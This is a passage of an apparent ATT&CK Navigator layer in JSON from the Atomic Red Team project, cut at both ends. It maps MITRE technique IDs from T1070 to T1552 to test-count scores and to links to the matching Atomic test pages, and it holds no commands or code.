Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":59,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View 